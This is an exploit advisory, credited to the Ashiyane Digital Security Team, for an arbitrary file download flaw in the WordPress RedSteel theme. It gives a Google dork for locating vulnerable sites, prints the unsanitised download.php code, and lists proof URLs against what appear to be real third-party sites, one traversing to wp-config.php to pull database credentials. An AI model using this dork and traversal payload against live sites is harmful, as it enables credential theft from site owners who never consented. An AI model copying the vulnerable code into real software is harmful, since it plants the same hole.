|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#| |-------------------------------------------------------------------------| |[*] Exploit Title: Wordpress RedSteel Theme Arbitrary File Download Vulnerability | |[*] Google Dork: inurl:wp-content/themes/RedSteel | |[*] Date : Date: 2015-01-25 | |[*] Exploit Author: Ashiyane Digital Security Team | |[*] Vendor Homepage : http://www.webdesignlessons.com/redsteel-wordpress-theme/ | |[*] Tested on: Windows 7 | |[*] Discovered By : ACC3SS | |-------------------------------------------------------------------------| | |[*] Location : [localhost]/wp-content/themes/RedSteel/download.php?file=filename.php | |-------------------------------------------------------------------------|download.php | Vulnerable file : download.php | | Vulnerable code : | <?php $file = @$_GET['file']; $parts = explode('/',$file); $fileName = $parts[sizeof($parts)-1]; if ((isset($file))&&(file_exists($file))) { header("Content-type: application/force-download"); header('Content-Disposition: inline; filename="' . $fileName . '"'); header("Content-Transfer-Encoding: Binary"); header("Content-length: ".filesize($file)); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="' . $fileName . '"'); readfile($file); } ?> | |[*] Proof: | |[*] http://dixonpeXst.com/wp-content/themes/RedSteel/download.php?file=../../../wp-config.php | |[*] http://rmhctallaXhassee.org/wp-content/themes/RedSteel/download.php?file=download.php | |[*] | | |-------------------------------------------------------------------------| |-------------------------------------------------------------------------| |-------------------------------------------------------------------------| |#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|